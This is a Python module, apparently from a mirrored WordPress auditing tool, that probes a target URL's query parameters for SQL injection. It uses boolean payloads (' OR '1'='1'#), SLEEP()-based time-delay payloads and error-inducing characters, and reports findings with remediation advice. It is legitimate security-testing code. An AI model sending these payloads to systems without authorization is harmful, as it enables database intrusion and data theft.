mirror of
https://gh.wpcy.net/https://github.com/JulesJujuu/wpaudit.git
synced 2026-04-17 08:42:18 +08:00
354 lines
20 KiB
Python
354 lines
20 KiB
Python
# Module for Contextual WordPress SQLi Checks
|
|
import requests
|
|
import re
|
|
from urllib.parse import urlparse, parse_qs, urlencode, quote_plus
|
|
from .utils import make_request
|
|
import difflib # For comparing response bodies (optional, can be heavy)
|
|
|
|
# Database error signatures searched for in response bodies (non-exhaustive).
# Every pattern is compiled case-insensitively; a single match is enough for
# the error-based check to report a hit.
SQL_ERROR_PATTERNS = [
    # MySQL / MariaDB (the usual WordPress backend)
    re.compile(r"you have an error in your sql syntax", re.IGNORECASE),
    re.compile(r"warning: mysql_", re.IGNORECASE),
    re.compile(r"supplied argument is not a valid MySQL result resource", re.IGNORECASE),
    # Banner printed by WordPress' wpdb class when database errors are shown;
    # it precedes any database error, not only syntax errors.
    re.compile(r"WordPress database error", re.IGNORECASE),
    # Microsoft SQL Server
    re.compile(r"unclosed quotation mark after the character string", re.IGNORECASE),
    re.compile(r"Microsoft OLE DB Provider for SQL Server", re.IGNORECASE),
    # Oracle
    re.compile(r"quoted string not properly terminated", re.IGNORECASE),
    re.compile(r"SQL command not properly ended", re.IGNORECASE),
    re.compile(r"Oracle ODBC Driver", re.IGNORECASE),
    re.compile(r"ORA-\d{5}:", re.IGNORECASE),  # Oracle error codes
    # PostgreSQL / generic
    re.compile(r"PostgreSQL query failed", re.IGNORECASE),
    re.compile(r"Syntax error near", re.IGNORECASE),
]
|
|
|
|
# Characters/sequences appended to a parameter value, one at a time, to try to
# break the SQL statement and provoke a database error message.
SQLI_ERROR_TEST_CHARS = ["'", "\"", "`", "-- ", "#", ";", "\\"]
|
|
|
|
# Basic boolean-based SQLi payloads, grouped by the SQL context the injected
# value is assumed to sit in.
# Each entry is a pair: (payload_true_suffix, payload_false_suffix). Both
# suffixes are appended to the original parameter value; a vulnerable
# parameter should answer the two requests differently.
# Payloads are stored raw here and are URL-encoded when the test URL is built.
# '#' is used as the trailing SQL comment marker.
SQLI_BOOLEAN_PAYLOADS = {
    "numeric_context": [
        (" OR 1=1#", " OR 1=2#"),
        (" AND 1=1#", " AND 1=2#"),
        (" OR true#", " OR false#"),
        (" AND true#", " AND false#"),
        # More complex conditions can be added here.
    ],
    "string_context_single_quote": [
        ("' OR '1'='1'#", "' OR '1'='2'#"),
        ("' AND '1'='1'#", "' AND '1'='2'#"),
        ("' OR true#", "' OR false#"),
        ("' AND true#", "' AND false#"),
    ],
    "string_context_double_quote": [
        ("\" OR \"1\"=\"1\"#", "\" OR \"1\"=\"2\"#"),
        ("\" AND \"1\"=\"1\"#", "\" AND \"1\"=\"2\"#"),
        ("\" OR true#", "\" OR false#"),
        ("\" AND true#", "\" AND false#"),
    ],
}
|
|
|
|
# Time-based blind SQLi payloads.
# They rely on the SLEEP() function (MySQL/MariaDB, the WordPress default).
# Each entry is a pair: (payload_suffix, sleep_duration_seconds).
# The sleep duration is baked into the payload text when this module is
# imported, so changing SLEEP_DURATION_SECONDS afterwards does not alter the
# payloads already built below.
SLEEP_DURATION_SECONDS = 5  # Base sleep duration, in seconds

SQLI_TIME_BASED_PAYLOADS = {
    "numeric_context": [
        (f" AND SLEEP({SLEEP_DURATION_SECONDS})#", SLEEP_DURATION_SECONDS),
        (f" OR SLEEP({SLEEP_DURATION_SECONDS})#", SLEEP_DURATION_SECONDS),
        # BENCHMARK() could be used as well, but SLEEP() gives a simpler,
        # more predictable delay to detect.
    ],
    "string_context_single_quote": [
        # '-- ' (with trailing space) is the comment marker in string contexts.
        (f"' AND SLEEP({SLEEP_DURATION_SECONDS})-- ", SLEEP_DURATION_SECONDS),
        (f"' OR SLEEP({SLEEP_DURATION_SECONDS})-- ", SLEEP_DURATION_SECONDS),
    ],
    "string_context_double_quote": [
        (f"\" AND SLEEP({SLEEP_DURATION_SECONDS})-- ", SLEEP_DURATION_SECONDS),
        (f"\" OR SLEEP({SLEEP_DURATION_SECONDS})-- ", SLEEP_DURATION_SECONDS),
    ],
}
|
|
|
|
|
|
def _test_sqli_payload(url, config, expected_content_pattern=None, compare_to_response=None, expected_delay_seconds=None):
    """
    Send one GET probe to ``url`` and look for SQL injection indicators.

    The checks run in this order and the first one that fires decides the result:
      1. Time-based: only when ``expected_delay_seconds`` is given.
      2. Error-based: any regex from SQL_ERROR_PATTERNS found in the body.
      3. Boolean: ``expected_content_pattern`` found in the body.
      4. Boolean: body length differs markedly from ``compare_to_response``.

    Args:
        url: Fully built URL, payload already embedded in the query string.
        config: Mapping read via ``.get`` for 'request_timeout' (default 10)
            and 'time_based_test_buffer' (default 3); also passed through to
            ``make_request``.
        expected_content_pattern: Optional compiled regex whose presence in the
            body marks a boolean "true" response.
        compare_to_response: Optional earlier response whose ``.text`` length
            is compared with this response's.
        expected_delay_seconds: Optional delay the payload is expected to
            cause; enables the time-based check and replaces the request
            timeout with ``expected_delay_seconds + buffer``.

    Returns:
        A ``(response, detail)`` tuple. ``response`` is None when no response
        was obtained (``detail`` then explains why). ``detail`` is None when a
        response was received but none of the checks fired.
    """
    request_timeout = config.get('request_timeout', 10)  # Default general timeout

    if expected_delay_seconds:
        # The timeout must outlast the injected delay, otherwise the sleep
        # could never be observed.
        time_based_buffer = config.get('time_based_test_buffer', 3)
        request_timeout = expected_delay_seconds + time_based_buffer

    try:
        response = make_request(url, config, method="GET", timeout=request_timeout)

        # Compare against None explicitly instead of relying on truthiness.
        # NOTE(review): assumes make_request returns a requests.Response-like
        # object; such objects evaluate as False for 4xx/5xx statuses, and
        # those error pages are precisely where SQL error text tends to show.
        if response is None:
            return None, "No response object received from make_request"

        elapsed_time = response.elapsed.total_seconds()

        # 1. Time-based check (if applicable)
        if expected_delay_seconds:
            # Accept anything from 90% of the expected delay up to (but not
            # including) the request timeout.
            if (elapsed_time >= expected_delay_seconds * 0.9) and (elapsed_time < request_timeout):
                return response, f"Potential time-based SQLi: Response took {elapsed_time:.2f}s (expected ~{expected_delay_seconds}s)"

        # Checked after the time-based test, which does not need a body.
        if not response.text:
            return response, "No response content"

        # 2. Error-based check
        for pattern in SQL_ERROR_PATTERNS:
            if pattern.search(response.text):
                return response, f"SQL error pattern matched: {pattern.pattern}"

        # 3. Boolean-based: expected content pattern match (for "true" conditions)
        if expected_content_pattern and expected_content_pattern.search(response.text):
            return response, "Expected content pattern matched (boolean true)"

        # 4. Boolean-based: compare to another response
        if compare_to_response is not None and compare_to_response.text:
            len_current = len(response.text)
            len_compare = len(compare_to_response.text)
            # Significant means more than 100 characters or more than 10% of
            # the longer body, whichever is larger.
            if abs(len_current - len_compare) > max(100, 0.1 * max(len_compare, len_current, 1)):
                return response, f"Significant content length difference (current: {len_current}, compared: {len_compare})"

        return response, None  # No specific SQLi indicator found by these checks

    except requests.exceptions.Timeout:
        # The request exceeded the (possibly extended) timeout computed above.
        return None, f"Request timed out after {request_timeout}s"
    except Exception as e:
        # Best-effort probe: report the failure to the caller instead of
        # aborting the whole scan.
        return None, f"Error during request: {e}"
|
|
|
|
|
|
def _sqli_build_url(parsed_url, query_params, param, value):
    """Return the target URL with ``param`` set to ``value``.

    Every other parameter keeps the first value parsed from the original query.
    """
    params = {name: vals[0] for name, vals in query_params.items()}
    params[param] = value
    return parsed_url._replace(query=urlencode(params)).geturl()


def _sqli_probe_error(parsed_url, query_params, param, base_value, config):
    """Try each error-inducing character on ``param``; return the first hit or None."""
    for test_char in SQLI_ERROR_TEST_CHARS:
        payload_val = base_value + test_char
        test_url = _sqli_build_url(parsed_url, query_params, param, payload_val)

        _, error_detail = _test_sqli_payload(test_url, config)
        if error_detail and "SQL error pattern matched" in error_detail:
            print(f" [!!!] Potential Error-based SQLi for param '{param}' with char '{test_char}'")
            # The first character that provokes an SQL error is enough; the
            # remaining characters are not tried for this parameter.
            return {
                "url": test_url, "parameter": param, "payload_used": payload_val,
                "type": "Error-based", "observation": error_detail
            }
    return None


def _sqli_probe_boolean(parsed_url, query_params, param, base_value, config, original_response):
    """Compare true/false payload pairs against the baseline; return the first hit or None."""
    for context_type, payload_pairs in SQLI_BOOLEAN_PAYLOADS.items():
        for true_suffix, false_suffix in payload_pairs:
            payload_true_val = base_value + true_suffix
            payload_false_val = base_value + false_suffix
            url_true = _sqli_build_url(parsed_url, query_params, param, payload_true_val)
            url_false = _sqli_build_url(parsed_url, query_params, param, payload_false_val)

            print(f" Testing boolean pair for {context_type}: TRUE='{true_suffix}', FALSE='{false_suffix}'")

            resp_true, detail_true = _test_sqli_payload(url_true, config)
            resp_false, detail_false = _test_sqli_payload(url_false, config)

            # A pair that itself triggers an SQL error says nothing about
            # boolean behaviour; that case belongs to the error-based check.
            if (detail_true and "SQL error" in detail_true) or \
               (detail_false and "SQL error" in detail_false):
                print(f" Skipping boolean for {param} with {true_suffix}/{false_suffix} due to SQL error in response.")
                continue

            # All three responses are needed for the differential comparison.
            if resp_true is None or resp_false is None:
                continue
            if original_response is None or not original_response.text:
                continue

            len_orig = len(original_response.text)
            len_true = len(resp_true.text) if resp_true.text else 0
            len_false = len(resp_false.text) if resp_false.text else 0

            similar_threshold = config.get('sqli_boolean_similarity_threshold', 0.10)  # 10%

            is_true_diff_false = abs(len_true - len_false) > similar_threshold * max(len_true, len_false, 1)
            is_true_like_orig = abs(len_true - len_orig) < similar_threshold * max(len_true, len_orig, 1)
            is_false_like_orig = abs(len_false - len_orig) < similar_threshold * max(len_false, len_orig, 1)

            # Hit: the two answers differ and exactly one of them (XOR)
            # resembles the untouched page.
            if is_true_diff_false and (is_true_like_orig != is_false_like_orig):
                print(f" [!!!] Potential Boolean-based SQLi for param '{param}' (Context: {context_type})")
                return {
                    "url_true": url_true, "url_false": url_false, "parameter": param,
                    "payload_true": payload_true_val, "payload_false": payload_false_val,
                    "type": "Boolean-based (Differential)",
                    "observation": f"Response lengths: Original={len_orig}, True={len_true}, False={len_false}. Significant difference suggests boolean-based SQLi."
                }
    return None


def _sqli_probe_time(parsed_url, query_params, param, base_value, config):
    """Send SLEEP-style payloads on ``param``; return the first delayed hit or None."""
    for context_type, time_payloads in SQLI_TIME_BASED_PAYLOADS.items():
        for payload_suffix, sleep_duration in time_payloads:
            payload_val = base_value + payload_suffix
            test_url = _sqli_build_url(parsed_url, query_params, param, payload_val)

            print(f" Testing time-based for {context_type} with '{payload_suffix}' (expect ~{sleep_duration}s delay)")

            _, time_detail = _test_sqli_payload(test_url, config, expected_delay_seconds=sleep_duration)

            if time_detail and "Potential time-based SQLi" in time_detail:
                print(f" [!!!] Potential Time-based SQLi for param '{param}' (Context: {context_type})")
                return {
                    "url": test_url, "parameter": param, "payload_used": payload_val,
                    "type": "Time-based Blind", "observation": time_detail
                }
    return None


def analyze_sqli(state, config, target_url):
    """
    Performs enhanced heuristic checks for potential SQLi vulnerabilities.

    Each query parameter of ``target_url`` is probed with error-based payloads
    first. Boolean-based and time-based probes run only for parameters that
    did not already produce an SQL error, to limit noise from error pages.
    This is NOT a comprehensive SQLi scanner. Use SQLMap for thorough testing.

    Args:
        state: Scan state object; this function calls its
            ``get_module_findings``, ``update_module_findings`` and
            ``add_remediation_suggestion`` methods.
        config: Mapping of scan settings, read via ``.get`` and passed to the
            request helper.
        target_url: URL whose query-string parameters are tested.

    Returns:
        None. Results are stored under the "contextual_sqli" key of the
        "wp_analyzer" module findings.
    """
    module_key = "wp_analyzer"
    findings_key = "contextual_sqli"
    list_keys = ("potential_error_based_sqli", "potential_boolean_based_sqli", "potential_time_based_sqli")

    all_wp_analyzer_findings = state.get_module_findings(module_key, {})
    findings = all_wp_analyzer_findings.get(findings_key, {})
    if not findings:  # Initialize with default structure
        findings = {
            "status": "Not Checked",
            "details": "",
            "potential_error_based_sqli": [],
            "potential_boolean_based_sqli": [],
            "potential_time_based_sqli": [],
            "recommendation": "Use dedicated SQLi tools (like SQLMap) for comprehensive analysis."
        }

    findings["status"] = "Running"
    findings["details"] = "Performing enhanced heuristic SQLi checks..."
    # Start every run from empty result lists so that points recorded by an
    # earlier run can never sit next to this run's summary.
    for list_key in list_keys:
        findings[list_key] = []

    all_wp_analyzer_findings[findings_key] = findings
    state.update_module_findings(module_key, all_wp_analyzer_findings)  # Save initial state

    print(" [i] Performing enhanced SQLi heuristic checks (error, boolean, time-based)...")

    parsed_target_url = urlparse(target_url)
    original_query_params = parse_qs(parsed_target_url.query)

    if not original_query_params:
        findings["details"] = "No query parameters in target URL to test for SQLi."
        findings["status"] = "Completed"
        all_wp_analyzer_findings = state.get_module_findings(module_key, {})  # Re-fetch
        all_wp_analyzer_findings[findings_key] = findings
        state.update_module_findings(module_key, all_wp_analyzer_findings)
        print(" [i] No query parameters in target URL for SQLi checks.")
        return

    # Baseline response for the boolean differential comparison.
    # _test_sqli_payload returns a (response, detail) pair.
    original_response, _ = _test_sqli_payload(target_url, config)
    if original_response is None:
        print(f" [-] Could not fetch original page {target_url}. Boolean-based checks might be less reliable.")

    error_based_points = []
    boolean_based_points = []
    time_based_points = []

    print(f" Checking {len(original_query_params)} parameter(s) in URL: {target_url}")
    for param, values in original_query_params.items():
        # Only the first value of a repeated parameter is tested.
        original_value = values[0]
        str_original_value = str(original_value) if original_value is not None else ""

        # 1. Error-based SQLi checks
        print(f" Testing error-based SQLi for param '{param}'...")
        error_point = _sqli_probe_error(parsed_target_url, original_query_params, param, str_original_value, config)
        if error_point is not None:
            error_based_points.append(error_point)
            # Boolean/time probes on a parameter that already yields SQL
            # errors would mostly measure the error page, so skip them.
            continue

        # 2. Boolean-based SQLi checks
        print(f" Testing boolean-based SQLi for param '{param}'...")
        boolean_point = _sqli_probe_boolean(
            parsed_target_url, original_query_params, param, str_original_value, config, original_response
        )
        if boolean_point is not None:
            boolean_based_points.append(boolean_point)

        # 3. Time-based blind SQLi checks (independent of the boolean result)
        print(f" Testing time-based SQLi for param '{param}'...")
        time_point = _sqli_probe_time(parsed_target_url, original_query_params, param, str_original_value, config)
        if time_point is not None:
            time_based_points.append(time_point)

    findings["potential_error_based_sqli"] = error_based_points
    findings["potential_boolean_based_sqli"] = boolean_based_points
    findings["potential_time_based_sqli"] = time_based_points

    details_parts = []
    if error_based_points:
        details_parts.append(f"{len(error_based_points)} potential error-based SQLi point(s)")
    if boolean_based_points:
        details_parts.append(f"{len(boolean_based_points)} potential boolean-based SQLi point(s)")
    if time_based_points:
        details_parts.append(f"{len(time_based_points)} potential time-based SQLi point(s)")

    if details_parts:
        findings["details"] = f"Found {', '.join(details_parts)}. This strongly suggests SQLi vulnerabilities. Use SQLMap for confirmation and exploitation."
        remediation_desc = f"Enhanced heuristic checks suggest potential SQL Injection vulnerabilities: {', '.join(details_parts)}."
        if time_based_points:
            remediation_desc += " Time-based techniques indicate blind SQLi is likely."

        state.add_remediation_suggestion("sqli_heuristic_enhanced", {
            "source": "WP Analyzer (SQLi Heuristic - Enhanced)",
            "description": remediation_desc,
            "severity": "High",
            "remediation": "Immediately investigate and fix these potential SQLi vulnerabilities. Use parameterized queries or prepared statements. Validate and sanitize all user inputs. Run a full scan with a dedicated SQLi tool like SQLMap to confirm and assess the impact. Pay special attention to blind SQLi if time-based results were found."
        })
    else:
        findings["details"] = "No obvious SQLi indicators detected from enhanced heuristic checks (error, boolean, time-based). This does not rule out SQLi. Use SQLMap for thorough testing."

    findings["status"] = "Completed"
    all_wp_analyzer_findings = state.get_module_findings(module_key, {})  # Re-fetch
    all_wp_analyzer_findings[findings_key] = findings
    state.update_module_findings(module_key, all_wp_analyzer_findings)
    print(f" [+] Enhanced SQLi heuristic checks finished. Details: {findings['details']}")
|